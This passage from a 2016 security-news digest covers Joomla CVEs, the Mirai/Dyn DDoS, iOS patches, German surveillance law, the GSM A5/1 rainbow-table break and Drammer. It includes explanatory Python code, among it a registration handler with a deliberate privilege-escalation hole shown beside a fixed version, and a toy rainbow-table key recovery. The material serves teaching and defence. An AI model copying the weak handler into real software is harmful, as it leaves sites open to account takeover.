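        zone = servers[server]
        if name in zone and "A" in zone[name]:
            return zone[name]["A"]
        # Most specific delegation whose zone contains the queried name
        covering = [z for z, rr in zone.items()
                    if "NS" in rr and (name == z or name.endswith("." + z))]
        if not covering:
            return None
        ns_names = sorted(zone[max(covering, key=len)]["NS"])
        if not ns_names or ns_names[0] not in servers:
            return None
        server = ns_names[0]
    return None


def normalize_ns(names: Iterable[str]) -> Set[str]:
    """Canonical NS names as returned by dig or whois: lowercase, trailing dot."""
    out: Set[str] = set()
    for n in names:
        n = n.strip().lower()
        out.add(n if n.endswith(".") else n + ".")
    return out


def delegation_drift(observed_ns: Iterable[str],
                     expected_ns: Iterable[str] = EXPECTED_NS) -> Set[str]:
    """Name servers the registry now reports that are not in our baseline.

    A non-empty result is the earliest reliable signal of a hijack like this one:
    the company's servers keep answering, but nobody is being sent to them.
    """
    return normalize_ns(observed_ns) - normalize_ns(expected_ns)


if __name__ == "__main__":
    intact = build_servers(EXPECTED_NS)
    hijacked = build_servers({"ns1.rogue.example."})
    print("normal:", resolve("www.yourdomain.com.", intact))
    print("after registry change:", resolve("www.yourdomain.com.", hijacked))
    print("company NS asked directly:", resolve("www.yourdomain.com.", hijacked,
                                                start="ns1.yourdomain.com."))
    print("drift:", delegation_drift(["NS1.Rogue.Example"]))
```

Feeding `delegation_drift` the NS set from a periodic registry (whois) or parent-zone query, rather than from your own resolver cache, is what catches this class of incident early; the company's own servers show nothing wrong.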

Read the full article: https://www.linkedin.com/pulse/domain-hijacking-invisible-destructive-threat-we-should-marinho


Two Critical Vulnerabilities Patched in Joomla 3.6.4. Update it asap!
26.10.2016 securityaffairs Vulnerebility

Joomla has released the new version Joomla 3.6.4 that fixes two critical account creation vulnerabilities affecting the popular CMS.
Recently we discussed cyber attacks in the wild leveraging compromised websites running the Joomla CMS. For example, in February, security experts observed a spike in the number of compromised Joomla-based websites used in Admedia attacks.

This week a new version of the Joomla CMS, Joomla 3.6.4, was released; it fixes two critical account creation vulnerabilities.

Both vulnerabilities have been rated high severity; the Joomla team fixed both within a few days.


The first flaw, tracked as CVE-2016-8870, could be exploited by an attacker to register on a website even when the registration has been disabled. The vulnerability affects the Joomla core in versions 3.4.4 through 3.6.3.

“Inadequate checks allows for users to register on a site when registration has been disabled.” states the description of the flaw published by Joomla.

The second flaw, tracked as CVE-2016-8869, can be exploited by users to register on a website, but with elevated privileges.

“Incorrect use of unfiltered data allows for users to register on a site with elevated privileges.” states the description of the flaw published by Joomla.

The flaw, reported by Davide Tampellini on October 21, is caused by incorrect use of unfiltered data. Affected Joomla versions range from 3.4.4 through 3.6.3.

The Joomla! Security Strike Team (JSST) urges administrators of websites running the popular CMS to update and patch their installations as soon as possible.

Now that the flaws have been publicly disclosed, crooks will try to exploit them in order to compromise websites and use them for illegal activities; for this reason, it is essential to apply the updates urgently.
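The two weaknesses the advisory names, a registration path that ignores the "registration disabled" setting and one that copies unfiltered client data into the new account, are illustrated below with a generic registration handler written for this page in Python. It is not Joomla's PHP code and does not reproduce the patched code paths; the setting name, field names and group names are constructed for the example.

```python
"""Added illustration of the two bug classes in the Joomla 3.6.4 advisory,
as a generic self-registration handler. Not Joomla code; all names constructed."""
from typing import Any, Dict

# Fields a self-registration form is allowed to set (constructed allow-list).
ALLOWED_FIELDS = {"username", "email", "password"}
# Group every self-registered account gets; privilege is never taken from the form.
DEFAULT_GROUP = "registered"


class RegistrationDisabled(Exception):
    """Raised when self-registration is switched off in the site settings."""


def register_unfiltered(form: Dict[str, Any], settings: Dict[str, Any]) -> Dict[str, Any]:
    """The weak pattern: the 'allow_registration' setting is never consulted,
    and every submitted field, including group membership, is copied into the
    new account, so a form that carries its own 'groups' value picks its own
    privileges. Kept here only as the 'before' picture."""
    account = dict(form)
    account.setdefault("groups", [DEFAULT_GROUP])
    return account


def register_hardened(form: Dict[str, Any], settings: Dict[str, Any]) -> Dict[str, Any]:
    """Server-side gate first, then an allow-list of client-settable fields."""
    if not settings.get("allow_registration", False):
        raise RegistrationDisabled("self-registration is disabled on this site")
    account = {k: v for k, v in form.items() if k in ALLOWED_FIELDS}
    missing = ALLOWED_FIELDS - account.keys()
    if missing:
        raise ValueError(f"missing required fields: {sorted(missing)}")
    # Privilege is decided by the server; nothing the client sent can raise it.
    account["groups"] = [DEFAULT_GROUP]
    return account


if __name__ == "__main__":
    submitted = {"username": "alice", "email": "alice@example.test",
                 "password": "correct horse", "groups": ["administrator"]}
    print(register_unfiltered(submitted, {"allow_registration": False})["groups"])
    print(register_hardened(submitted, {"allow_registration": True})["groups"])
```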

WhatsApp Video Calling is Now Available for Android – Download Beta Version Now!
25.10.2016 thehackernews Android
WhatsApp is, no doubt, the largest end-to-end encrypted messaging network; it allows over a billion users to send messages, photos, videos, voice messages, documents, and calls that are protected from falling into the wrong hands.
And now it seems like WhatsApp is rolling out a much-awaited feature for the new beta versions of its Android app: Video Calling.
New beta version 2.16.318 of WhatsApp brings the ability for users to conduct video calls.
To start a video call, you simply need to pull up a contact in the WhatsApp app, tap the call icon and choose "Video Call." You can also go directly to the Calls tab to start one.
Video calls only work if both the caller and the receiver have the same beta build of WhatsApp that supports the feature. If not, you will be shown an error message saying that your contact needs to update their app.
Download the latest build for WhatsApp Android from APKMirror now and give it a try.
For now, the Video calling feature is limited to WhatsApp's recent beta builds, reported Android Police, which first spotted the feature. So, you either need to download the APK link mentioned above or sign up to become a beta tester and update to WhatsApp (Beta) straight from the Google Play Store.
However, even if the feature doesn't work, there is a possible trick that you can try in order to activate the WhatsApp Video Calling feature.
Possible Trick to Activate WhatsApp Video Calling Feature
You simply need to follow these steps:
Backup all your chats,
Wipe WhatsApp data,
Log in again on WhatsApp.
You can try the above trick, which has helped some users activate the video calling feature, but make sure you successfully back up your chats first.
Reportedly, WhatsApp Video Calling feature also provides an option to mute the call. You can even switch between the front and rear camera on your phone, just like any other video calling apps. Your app's call history list now displays both video and voice calls.
With its release in a stable version for over 1 billion users in the coming weeks, the WhatsApp video calling feature could effectively ruin the market for Google's video calling app Duo, which was released just a few months ago.

Chinese Electronics Firm to Recall its Smart Cameras recently used to Take Down Internet
25.10.2016 thehackernews Security
You might be surprised to know that your security cameras, Internet-connected toasters and refrigerators may have inadvertently participated in the massive cyber attack that broke a large portion of the Internet on Friday.
That's due to massive Distributed Denial of Service (DDoS) attacks against Dyn, a major domain name system (DNS) provider that many sites and services use as their upstream DNS provider for translating human-readable website names into IP addresses.
The result we all know:
Twitter, GitHub, Amazon, Netflix, Pinterest, Etsy, Reddit, PayPal, and Airbnb were among hundreds of sites and services that were rendered inaccessible to millions of people worldwide for several hours.
Why and How the Deadliest DDoS Attack Happened
It was reported that the Mirai bots were used in the massive DDoS attacks against DynDNS, but they "were separate and distinct" bots from those used to execute record-breaking DDoS attack against French Internet service and hosting provider OVH.
Here's why: initially the source code of the Mirai malware was limited to a small number of hackers who knew of the underground hacking forum where it was released.
But later, the link to the Mirai source code suddenly received a huge promotion from thousands of media websites after it got exclusively publicized by journalist Brian Krebs on his personal blog.
Due to the worldwide news coverage and promotion, copycat and amateur hackers are now building their own botnets by hacking millions of smart devices to launch DDoS attacks, as well as to make money by selling their botnets as DDoS-for-hire services.
Mirai malware is designed to scan for Internet of Things (IoT) devices – mostly routers, security cameras, DVRs or WebIP cameras, Linux servers, and devices running Busybox – that are still using their default passwords. It enslaves vast numbers of these devices into a botnet, which is then used to launch DDoS attacks.
Chinese Firm Admits Its Hacked DVRs and Cameras Were Behind Largest DDoS Attack
More such attacks are expected to happen and will not stop until IoT manufacturers take the security of these Internet-connected devices seriously.
One such IoT electronics manufacturer is the Chinese firm Hangzhou Xiongmai Technology, which admitted its products – DVRs and internet-connected cameras – inadvertently played a role in Friday's massive cyber attack against DynDNS.
The Mirai malware can easily be removed from infected devices by rebooting them, but the devices will end up being infected again within minutes if their owners and manufacturers do not take proper measures to protect them.
What's worse? Some of these devices, including connected devices from Xiongmai, cannot be protected because of hardcoded passwords and because their makers implemented them in a way that makes them hard to update.
"Mirai is a huge disaster for the Internet of Things," the company confirmed to IDG News. "[We] have to admit that our products also suffered from hacker's break-in and illegal use."
The company claimed to have rolled out patches for security vulnerabilities, involving weak default passwords, which allowed the Mirai malware to infect its products and use them to launch massive DDoS attack against DynDNS.
However, Xiongmai products that are running older versions of the firmware are still vulnerable. To tackle this issue, the company has advised its customers to update their product's firmware and change their default credentials.
The electronics components firm would also recall some of its earlier products, specifically webcam models, sold in the US and send customers a patch for products made before April last year, Xiongmai said in a statement on its official microblog.
Hackers are selling IoT-based Botnet capable of 1 Tbps DDoS Attack
Even worse is expected:
Friday's DDoS attack, which knocked down half of the Internet in the U.S., is just the beginning, because hackers have started selling access to a huge army of hacked IoT devices built to launch attacks capable of severely disrupting any web service.
The seller claimed their botnet could generate 1 Tbps of traffic, almost equal to the world's largest DDoS attack, against OVH earlier this month, Forbes reported.
Anyone could buy 50,000 bots for $4,600, and 100,000 bots for $7,500, which can be combined to overwhelm targets with data.
Hacker groups have long sold access to botnets as a DDoS weapon for hire – like the infamous Lizard Squad's DDoS attack tool Lizard Stresser – but those botnets largely consisted of compromised vulnerable routers, not IoT devices like connected cameras, toasters, fridges and kettles (which are now available in bulk).
In a separate disclosure, a hacking group calling itself New World Hackers has also claimed responsibility for Friday's DDoS attacks, though this has not been confirmed.
New World Hackers is the same group that briefly knocked the BBC offline last year. The group claimed to be a hacktivist collective with members in China, Russia, and India.
Well, who is behind Friday's cyber attack is still unclear. The US Department of Homeland Security (DHS) and the FBI are investigating the DDoS attacks that hit DynDNS, but neither agency has yet speculated on who might be behind them.
The DynDNS DDoS attack has already shown the danger of IoT-based botnets, alarming both IoT manufacturers to start caring about implementing security on their products, and end users to start caring about the basic safety of their connected devices.

Warning! Your iPhone Can Get Hacked Just by Opening a JPEG Image, PDF or Font File
25.10.2016 thehackernews Apple
What's worse than knowing that innocent-looking JPEGs, PDFs and font files can hijack your iPhone, iPad, and iPod?
Yes, attackers can take over your vulnerable Apple iOS device remotely – all they have to do is trick you into viewing a maliciously crafted JPEG graphic or PDF file through a website or an email, which could allow them to execute malicious code on your device.
That's a terrible flaw (CVE-2016-4673), but the good news is that Apple has released the latest version of its mobile operating system, iOS 10.1, for iPhones and iPads to address this remote-code execution flaw, alongside an array of bug fixes.
And now that the company has rolled out a security patch, some attackers will surely look for still-unpatched Apple devices to exploit the vulnerability and take full control of them.
So, users running older versions of iOS are advised to update their mobile devices to iOS 10.1 as soon as possible.
Besides this remote code execution flaw, the newest iOS 10.1 includes security updates to address 11 security flaws in the firmware for the iPhone, iPad, and iPod Touch.
Those flaws include local code execution vulnerabilities, a remote code execution bug in WebKit (CVE-2016-4677), and a flaw in Contacts (CVE-2016-4686) that would allow an application to pull Address Book details even after access has been revoked.
To update your iOS device go to Settings → General → Software Update.
Security Updates for Mac, Apple Watch, and AppleTV
Apple has also released security updates for Mac PCs, Apple Watches and Apple TVs.
So, Mac users are advised to update their system to macOS Sierra (10.12.1), which includes security fixes for 16 CVE-listed vulnerabilities.
Those weaknesses include an image-handling bug (CVE-2016-4673), a denial of service (DoS) error in Nvidia graphics card drivers, a bug that exposed the length of user passwords, and Remote Code Execution (RCE) flaws that could be triggered by font files and PDF files, among others.
Meanwhile, Apple Watch users are recommended to update their devices to watchOS 3.1, which includes fixes for 8 security flaws.
Those flaws include 2 vulnerabilities in sandbox profiles that could allow third-party apps to view image libraries and sound files without permission.
AppleTV users are also advised to update their devices to tvOS 10.0.1, which includes patches for 10 vulnerabilities, including the WebKit remote code execution flaw, the sandbox profiles flaws, and the CoreGraphics JPEG flaw.
So get your Apple device patched before getting caught by hackers.

The German parliament passes a controversial surveillance law
25.10.2016 securityaffairs BigBrothers

The German Parliament passed a controversial surveillance law that seems to give more power to the BND intelligence agency.
The German Parliament last week approved a controversial espionage law that in theory will tighten oversight of the BND intelligence agency, but that according to privacy advocates will give more power to the authorities.

The experts focused their criticism on a controversial clause of the law that allows the BND to eavesdrop on communications of foreign organizations and individuals, on German soil and abroad, that are in transit through a major internet exchange point in Frankfurt.

The Frankfurt-based operator DE-CIX in September filed a suit against the government at a court in Leipzig over the new law, which it considers illegal.

The German Government maintains that the measures approved by the surveillance law will allow it to investigate online crime and terrorism.

“How do we want to find terror suspects? How do we want to detect them if not through those means?” said Clemens Binninger a lawmaker with Chancellor Angela Merkel’s conservative party.

In the past, the BND was not authorized to spy on its own population, but the new controversial surveillance law will allow it under specific circumstances.

The BND was previously allowed to monitor only up to 20 percent of the traffic at one exchange point, but the new law gives the agency full power and no limits when spying on Internet traffic.

“The law stipulates that through this activity it cannot be ruled out that the communications of German citizens and entities could also be accidentally intercepted, a major shift for the BND, which had been forbidden from spying on Germans.” reads a report published by Reuters.

The Greens have expressed their disappointment with the law and have threatened to petition Germany’s highest court and the European Court of Justice to repeal the surveillance law.

This law is considered a serious threat to the privacy of Germans; politicians and privacy defenders fear dragnet surveillance.

Lawmaker Martina Renner of the hard-left Left party speculates the monitoring equipment used by the BND is not able to discern messages sent by foreigners from those of the Germans.

Surveillance activities conducted by the BND have raised an intense debate on the domestic political front. According to revelations published by Der Spiegel, the agency supported the NSA in its global surveillance activities.

The entrance area of the headquarters of the Bundesnachrichtendienst (BND) in Pullach near Munich, photographed on Wednesday (10.05.06). Contrary to original plans, the Pullach BND headquarters will not be closed after all. The technical reconnaissance centre stays in Pullach with around 1,500 staff; the rest of the 6,000-strong workforce moves to Berlin. Photo: Johannes Simon/ ddp

The BND helped the NSA monitor European politicians; the intelligence agency targeted private companies and entities worldwide in order to establish dominance in cyberspace. Among the victims was also the German Government and its politicians, including Chancellor Angela Merkel. The German Government was shocked at the time and expressly voiced its dissent to President Obama.

The BND supported espionage operations against various targets, including the European companies EADS (the manufacturer of Airbus planes) and Eurocopter, and European politicians, including German ones.

In August, the German weekly Die Zeit disclosed documents that reveal how German intelligence made a deal with the NSA to get access to the surveillance platform XKeyscore.

Internal documents show that Germany’s domestic intelligence agency, the Federal Office for the Protection of the Constitution (BfV), received the software program XKeyscore from the NSA in return for data from Germany.

Back in 2011, the NSA demonstrated the capabilities of the XKeyscore platform to the BfV agency. After two years of negotiation, the BfV signed an agreement to receive the NSA software and install it for analyzing metadata collected on German citizens. In return, the German agency promised to share the metadata it collected.

The NSA tool collects ‘nearly everything a user does on the internet’; XKeyscore provides the ‘widest-reaching’ collection of online data, analyzing the content of emails, social media, and browsing history.

In 2013, documents leaked by Edward Snowden explained that a tool named DNI Presenter allows the NSA to read the content of stored emails and it also enables the intelligence analysts to track the user’s activities on Facebook through a system dubbed XKeyscore.

According to Die Zeit, the document “Terms of Reference” stated: “The BfV will: To the maximum extent possible share all data relevant to NSA’s mission”.
The BfV did not provide the details of the agreement to Germany’s data protection commissioner, nor did it inform the Parliamentary Control Panel.

In January, the BND resumed its internet surveillance with the support of the NSA; the activities had been suspended following the revelations about the mutual espionage activities. In July 2015 WikiLeaks revealed extensive economic espionage conducted by the NSA in Germany; the spies were particularly interested in the Greek debt crisis.

Back to the new German surveillance law, it bans the Intelligence from spying on EU countries and its citizens, as well as EU institutions, except in the case of investigation of terrorist activity.

“It also requires the BND to submit requests for cooperation with other spy agencies with a parliamentary committee and bans the agency from carrying out industrial espionage.” states Reuters.

“It requires the head of the BND, the chancellor’s office and an independent panel of judges to approve strategic foreign espionage activities.”

Discovery of Weapons Cache Reignites Fears ISIS Will Use Chemical Weapons in Battle for Mosul
25.10.2016 securityaffairs Cyber

The international coalition’s battle against ISIS in Mosul is expected to become the largest battle fought in Iraq since the US-led operation in 2003.
According to the Iraqi army, approximately 50 villages have been taken from the ISIS since last Monday, as the army prepares for the onslaught on Mosul, where 5,000 to 6,000 ISIS fighters are believed to remain.
The international coalition battling to eradicate ISIS in Mosul is a disparate assembly lacking true cohesion, as each member has its own reasons for fighting in this offensive.

“It’s a very, very dangerous cocktail,” Marina Ottaway, a Middle East expert at the Woodrow Wilson International Center for Scholars, said. “This is a group with completely different end-goals. There is a real fear that when they get rid of ISIS from Mosul then things are really going to blow up.”

The Key Players and Their Motivations:

Iraqi Security Forces – Leading the mission to recapture Mosul are Iraq’s security forces. In charge of a coalition of some 65,000 troops, the Iraqis have returned to the scene of their defeat reenergized and trained and equipped by the US. In recent months, they’ve amassed a few victories in liberating other ISIS-held areas.
Kurdish Peshmerga – While Iraqi security forces have been attacking from the south, Kurdish forces from Iraqi Kurdistan have advanced from the east and north. The Kurdish forces, known as Peshmerga, are in some instances fighting alongside Iraqi forces. A marriage of convenience, it is a potentially uneasy alliance. Both have an immediate need to defeat ISIS, as well as a U.S.-brokered oil deal signed in August. And, while the Iraqi government wants to eliminate ISIS’ presence in Iraq, the Kurds have an additional motive: that of becoming an independent, internationally recognized state.
Iraqi Militias – The majority of the Iraqi militias are Shiite Muslims backed by Iran. They aren’t officially part of the Iraqi security forces, but do fight in concert with them. According to NBC News, “while not officially part of the Iraqi security forces, the Popular Mobilization Units, or PMU, was formally recognized by the Baghdad government earlier this year as an ‘independent military formation.’ The PMU’s involvement in the ISIS fight has drawn significant criticism. An Amnesty International report this week accused the militias of ‘war crimes’ and ‘gross human rights violations,’ alleging its fighters were guilty of torturing, forcibly disappearing and executing Sunni Muslims they suspected of being ISIS sympathizers.”
Turkey – While Turkey’s involvement in the Mosul operation is still somewhat ambiguous, Turkey has set up a base in Kurdish-controlled territory inside Iraq. This is an action which has angered the Baghdad government, because it has not sanctioned Turkey’s presence. Turkey has, however, been training local Sunni tribesmen to join the assault on Mosul and local Christian and Yezidi fighters have also joined the offensive.
International Forces – On the ground the U.S. has more than 4,800 troops stationed in Iraq and reportedly “a good sizable portion” are at Qayyarah Airfield, a base 40 miles south of Mosul. Then too, some 200 U.S. personnel are embedded with Iraqi and Kurdish forces closer to the front. These are mostly special forces with advisory roles and Joint Terminal Attack Controllers who call in airstrikes. The US is joined by other nations in carrying out NATO’s “train, advise and assist” mandate. This includes forces from Australia, New Zealand, France, Sweden, Italy, Denmark and others.
In the midst of gearing up for battle, a chemical weapons cache was uncovered. Photographs taken in mid-October of the weapons, in addition to chemical readings from the stockpiled weapons, were obtained by the ground team of Ed Alexander of BLACKOPS Cyber, an intelligence agency which specializes in counterterrorism, advanced cyber capabilities and Darknet operations.

Iraqi troops had captured the cache of chemical weapons, which were previously held by ISIS in Qayarah, Iraq, a city east of ISIS territory in Mosul. This location is not far from where ISIS fired artillery shells filled with mustard gas at U.S. troops last month. One of three tests on the weapons showed a positive reading of a mustard agent, according to Military.Com.

The discovery of the weapons cache validates growing concerns that ISIS is planning to use chemical weapons against U.S. and Iraqi forces during the Mosul battle.

Iraqi forces requested that coalition forces assist with the recovery and containment of the weapons, including the 36 rockets found at the site, Alexander said.

According to an article by Joshua Phillip, at Epoch Times:

“According to Drew Berquist, a former intelligence contractor who recently returned from deployment in Iraq, ISIS has two factories for making homemade rockets—one in Raqqa, Syria, and another in Mosul—and said ‘that’s what these look like.’

He said the picture of the rockets are telling, ‘because they do that all over the region,’ and that it’s likely ISIS has stepped up its production for the coming fight for Mosul because ‘they view this as an apocalyptic battle.’”

Berquist also cautioned that the rockets can be fitted with different types of weapons, including chemical and explosive weapons. He said that ISIS has definitely used chemical weapons. “They’ve got them, and they’ll try to use them in the days and weeks ahead in Mosul.”

Moreover, Dr. Robert J. Bunker, adjunct faculty at Claremont Graduate University, who has studied chemical warfare, indicated that the images do show positive readings of chemical weapons.

ISIS has already massacred 284 villagers, including children, who were being used as human shields. The terrorist group has also taken 550 families hostage for continued use as human shields in Mosul, according to the UN. But, they too are at risk of being killed.

Local families have been waving the white flag as ISIS rounds up villagers in an attempt to hold off the approaching coalition forces in the battle for Mosul. Unfortunately, the waving of the white flags has been in vain.

Hacking GSM A5 crypto algorithm by using commodity hardware
25.10.2016 securityaffairs Mobil

Researchers demonstrated how to crack GSM A5/1 Stream Cipher using a general-purpose graphics processing unit computer with 3 NVIDIA GeForce GTX690 cards.
A group of security researchers from the Agency for Science, Technology and Research (A*STAR) demonstrated that the crypto scheme used to protect GSM mobile phone data can be broken within seconds. It was already known that A5/1 is vulnerable, at least since 2009.

Weaknesses in crypto algorithms (the A3 algorithm for authentication, the A5 algorithm for encryption, the A8 algorithm for key generation) that were never submitted to peer review because of non-disclosure are the main security issues of 2G implementations.

GSM only authenticates the user to the network and not vice versa. The security model, therefore, offers confidentiality and authentication, but limited authorization capabilities, and has no non-repudiation features. GSM uses several cryptographic algorithms for security. The A5/1 and A5/2 stream ciphers are used for ensuring over-the-air voice privacy. Both algorithms have been exploited:

A5/2 is exploitable with a real-time ciphertext-only attack.
A5/1 is exploitable with a rainbow table attack.
The main security concerns regarding GSM are:
Communications and signaling traffic in the fixed network are not protected.
Does not address active attacks, whereby some network elements (e.g. BTS: Base Station)
Only as secure as the fixed networks to which they connect.
Lawful interception was only considered as an afterthought.
Terminal identity cannot be trusted.
From a purely technological perspective, 3G networks use the KASUMI block cipher instead of the older A5/1 stream cipher, but KASUMI is also affected by several serious weaknesses.

Now the researchers from the A*STAR, Singapore, have demonstrated how to break the A5/1 stream cipher implemented by 2G by using commodity hardware.

“GSM uses an encryption scheme called the A5/1 stream cipher to protect data,” explained Jiqiang Lu from the A*STAR Institute for Infocomm Research. “A5/1 uses a 64-bit secret key and a complex key-stream generator to make it resistant to elementary attacks such as exhaustive key searches and dictionary attacks.”

The researchers exploited two security weaknesses to compute a look-up table on commodity hardware in 55 days. Once the rainbow table, which has a size of 984 GB, has been computed, they are able to determine the secret key used to encrypt communications in just nine seconds.


The new method drastically improves on the classic brute force attack by reducing the time required for the online computation.

“We used a rainbow table, which is constructed iteratively offline as a set of chains relating the secret key to the cipher output,” added Lu.

“When an output is received during an attack, the attacker identifies the relevant chain in the rainbow table and regenerates it, which gives a result that is very likely to be the secret key of the cipher.”

The experts used equipment consisting of a general-purpose graphics processing unit computer with three NVIDIA GeForce GTX 690 cards, costing about $15,000 in total.

“On a general-purpose graphics processing unit (GPGPU) computer with 3 NVIDIA GeForce GTX690 cards that cost about 15,000 United States dollars in total, we made a unified rainbow table of 984 GB in about 55 days, and implemented a unified rainbow table attack that had an online attack time of 9 s with a success probability of 34 % (or 56 %) when using 4 (respectively, 8) known keystreams (of 114 bits long each).” reads the white paper entitled Time–Memory Trade-Off Attack on the GSM A5/1 Stream Cipher Using Commodity GPGPU in the journal Applied Cryptography and Network Security. “If two such tables of 984 GB were generated, the attack would have an online attack time of 9 s with a success probability of 81 % when using 8 known keystreams. The practical results show again that nowadays A5/1 is rather insecure in reality and GSM should no longer use it.”
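The offline chain construction and online chain lookup that Lu describes, as an added illustration that is not code from the A*STAR paper: a constructed 16-bit keyed function stands in for A5/1, the reduction function and start-point spacing are assumptions of this example, and coverage() makes visible the table-size versus success-probability trade-off behind the 34 % and 56 % figures.

```python
import hashlib

KEY_BITS = 16                    # toy key size; A5/1 uses 64 bits
KEY_SPACE = 1 << KEY_BITS


def keystream(key: int) -> int:
    """Toy stand-in for the cipher's keystream generator: maps a 16-bit key
    to a 16-bit output. Constructed for illustration only; it is not A5/1."""
    digest = hashlib.sha256(key.to_bytes(2, "big")).digest()
    return int.from_bytes(digest[:2], "big")


def reduce_to_key(output: int, position: int) -> int:
    """Position-dependent reduction function: maps a cipher output back into
    the key space. Using a different reduction at each chain position is
    what distinguishes a rainbow table from plain Hellman chains."""
    return (output + position * 0x9E37) % KEY_SPACE


def build_table(num_chains: int, chain_len: int) -> dict:
    """Offline phase. Each chain starts at a key and alternates keystream()
    and reduce_to_key() for chain_len steps; only (end -> start) is stored,
    so memory is num_chains entries instead of the whole key space."""
    table = {}
    for c in range(num_chains):
        start = (1 + c * 7919) % KEY_SPACE   # deterministic start points (assumed)
        key = start
        for pos in range(chain_len):
            key = reduce_to_key(keystream(key), pos)
        table.setdefault(key, start)         # merged chains keep the first start
    return table


def recover_key(table: dict, chain_len: int, observed: int):
    """Online phase. Given one observed keystream output, guess which chain
    position produced it, walk to the chain end, look the end up, and if it
    is known regenerate the chain from its start to reach the key."""
    for pos in range(chain_len - 1, -1, -1):
        key = reduce_to_key(observed, pos)
        for later in range(pos + 1, chain_len):
            key = reduce_to_key(keystream(key), later)
        start = table.get(key)
        if start is None:
            continue
        # Endpoint matched: regenerate up to position pos and verify, because
        # chain merges and collisions produce false alarms.
        candidate = start
        for j in range(pos):
            candidate = reduce_to_key(keystream(candidate), j)
        if keystream(candidate) == observed:
            return candidate
    return None


def coverage(table: dict, chain_len: int) -> float:
    """Fraction of the key space the table can recover. Exhaustive measurement
    is only feasible on a toy key space; on the real cipher this fraction is
    the success probability the paper reports."""
    seen = set()
    for start in table.values():
        key = start
        for pos in range(chain_len):
            seen.add(key)
            key = reduce_to_key(keystream(key), pos)
    return len(seen) / KEY_SPACE


if __name__ == "__main__":
    CHAIN_LEN, NUM_CHAINS = 64, 2048
    table = build_table(NUM_CHAINS, CHAIN_LEN)
    print(f"{len(table)} stored endpoints cover {coverage(table, CHAIN_LEN):.1%} "
          f"of the {KEY_SPACE}-key space")
    secret = 0xBEEF                       # constructed "victim" key
    observed = keystream(secret)
    found = recover_key(table, CHAIN_LEN, observed)
    print("recovered key:", None if found is None else hex(found))
```

Whether 0xBEEF is recovered depends on whether it lies on a stored chain; more or longer chains raise coverage at the cost of table size and lookup time, which is the trade-off the paper tunes with its 984 GB table.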

Millions of Android smartphones exposed to new Drammer Android attack
25.10.2016 securityaffairs Android

A new method of attack dubbed DRAMMER could be exploited to gain ‘root’ access to millions of Android smartphones and take control of affected devices.
Earlier last year, security researchers from Google’s Project Zero outlined a way to hijack the computers running Linux by abusing a design flaw in the memory and gaining higher kernel privileges on the system.

Now, the same previously found design weakness has been exploited to gain unfettered “root” access to millions of Android smartphones, allowing potentially anyone to take control of the affected devices.

Experts from the VUSec Lab at Vrije Universiteit Amsterdam have discovered a vulnerability that could be exploited to gain “root” access to millions of Android smartphones by targeting the device’s dynamic random access memory (DRAM) using an attack called Rowhammer.

The Rowhammer attack is not new, but this is the first time it has been successfully used against mobile devices.

In March 2015, security researchers at Google’s Project Zero team demonstrated how to hijack Intel-compatible PCs running Linux by exploiting physical weaknesses in certain varieties of DDR DRAM (double data rate dynamic random-access memory) chips.

By exploiting the Rowhammer technique, attackers can obtain higher kernel privileges on the target system. Rowhammer is classified as a problem affecting some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows; in theory this means an attacker can change the value of a bit in memory.

The Rowhammer attack for mobile devices involves a malicious application that, once running, repeatedly accesses the same “row” of transistors on a memory chip within a tiny fraction of a second (the hammering process).

Hammering a specific portion of memory can electrically interfere with neighboring rows. This interference can cause the row to leak charge into the next row, which eventually causes a bit to flip and consequently modifies the data.

An attacker can exploit these modifications to execute arbitrary code and gain control of the device.

In short, Rowhammer is an issue with new generation DRAM chips in which repeatedly accessing a row of memory can cause “bit flipping” in an adjacent row that could allow anyone to change the value of contents stored in the memory.

The researchers created a proof-of-concept exploit, dubbed DRAMMER, to test the Rowhammer attack on mobile devices.

Details on the DRAMMER attack are included in a paper published by the experts and on this page.

To test the Rowhammer attack on mobile phones, the researchers created a new proof-of-concept exploit, dubbed DRAMMER. The hack could modify crucial bits of data, allowing an attacker to root Android devices from major vendors, including Samsung, OnePlus, LG, and Motorola.

The experts exploited the Android mechanism known as the ION memory allocator to give an app direct access to the dynamic random access memory (DRAM). The ION memory allocator also allows the attackers to identify adjacent rows on the DRAM, which is essential for the Rowhammer attack to generate bit flips.

This ability allowed the researchers to achieve root access on the victim’s device, giving them full control of the mobile device.

“On a high level, our technique works by exhausting available memory chunks of different sizes to drive the physical memory allocator into a state in which it has to start serving memory from regions that we can reliably predict,” states the paper.
“We then force the allocator to place the target security-sensitive data, i.e., a page table, at a position in physical memory which is vulnerable to bit flips and which we can hammer from adjacent parts of memory under our control.”

“Drammer is a new attack that exploits the Rowhammer hardware vulnerability on Android devices. It allows attackers to take control over your mobile device by hiding it in a malicious app that requires no permissions. Practically all devices are possibly vulnerable and must wait for a fix from Google in order to be patched. Drammer has the potential to put millions of users at risk, especially when combined with existing attack vectors like Stagefright or BAndroid.” states a blog post published by the researchers.

The experts successfully rooted Android handsets including Google’s Nexus 4 and Nexus 5; LG’s G4; Samsung Galaxy S4 and Galaxy S5, Motorola’s Moto G models from 2013 and 2014; and OnePlus One.


“Not only does our [DRAMMER] attack show that practical, deterministic Rowhammer attacks are a real threat to billions of mobile users, but it is also the first effort to show that Rowhammer is…(reliably exploitable) on any platform other than x86 and with a much more limited software feature set than existing solutions,” reads a paper published by the experts.

The DRAMMER app is able to take over the victim’s mobile device within minutes and does not require any user interaction.

The researchers published the following two proof-of-concept videos that demonstrate the DRAMMER attack in action against an unrooted LG Nexus 5.

In the first video, the phone is running Android 6.0.1 with the security patches Google released on October 5, while in the second one the researchers show how the DRAMMER attack can be combined with the Stagefright bug that is still unpatched in many older Android devices.

The researchers have released on GitHub the source code of the DRAMMER app in order to allow users to test their mobile device and anonymously share their results.

The experts reported the issue to Google in July, and the tech giant recognized it as a “critical” vulnerability and awarded the researchers $4,000 under its bug bounty program.

The issue is expected to be partially addressed in the upcoming November security bulletin, which will make it more difficult for an attacker to launch a DRAMMER attack.

The problem is that some of the software features DRAMMER exploits are so essential to any OS that it is not possible to remove or modify them without a significant impact on the overall design of the device.

Kaspersky Lab launched the new Lab ICS-CERT
25.10.2016 securityaffairs Security

Kaspersky Lab has launched a new global computer emergency response team (CERT), the Kaspersky Lab ICS-CERT, focusing on industrial control systems (ICS).
Kaspersky has anticipated launching an Industrial Control Systems CERT. Of course, I’m joking; in any case, I have always maintained that the creation of such a structure represents an important achievement for the cyber security of any government.

